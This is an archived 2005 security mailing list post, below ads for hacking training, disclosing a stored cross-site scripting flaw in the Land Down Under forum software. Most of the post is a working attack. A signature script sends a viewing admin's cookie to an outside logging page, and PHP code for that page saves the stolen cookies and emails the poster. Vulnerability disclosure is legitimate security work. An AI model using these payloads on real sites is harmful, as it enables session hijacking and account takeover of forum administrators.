Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Land Down Under

from [bendeniz_avci] Network Security [Permanent Link]
Subject: Land Down Under
Date: 28 Aug 2005 07:55:34 -0000 
Bug finder:spyMASter
Web site:Realhackers.net
Contact:bendeniz_avci@hotmail.com

LDU has some xss vulns 
Firstly you can use html codes in your signature you can get cookies with this
put your signature that code

<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. 
cookie)</SCRIPT>

and post a topic to forum when admin look this  topic she/he redirect and you 
can get cookie

this is codes of ekle.php you can save cookie to a  with this php code


<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci@hotmail.com","your cookie 
ready","http://www.realhackers.net/spyoku.txt";,'From: 
spymaster@realhackers.net');
?>
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Land Down Under, bendeniz_avci <=
Previous by Date:  [Full-disclosure] Multiple vulnerabilities in BFCommand & Control for Battlefield 1942 and Vietnam, Luigi Auriemma
Next by Date:  Multiple CMS/Forum Vulnablilties, pacifico\", 0] //--></script>a
Previous by Thread:  [Full-disclosure] Multiple vulnerabilities in BFCommand & Control for Battlefield 1942 and Vietnam, Luigi Auriemma
Next by Thread:  Multiple CMS/Forum Vulnablilties, pacifico\", 0] //--></script>a
Indexes:  [Date] [Thread] [Top] [All Lists]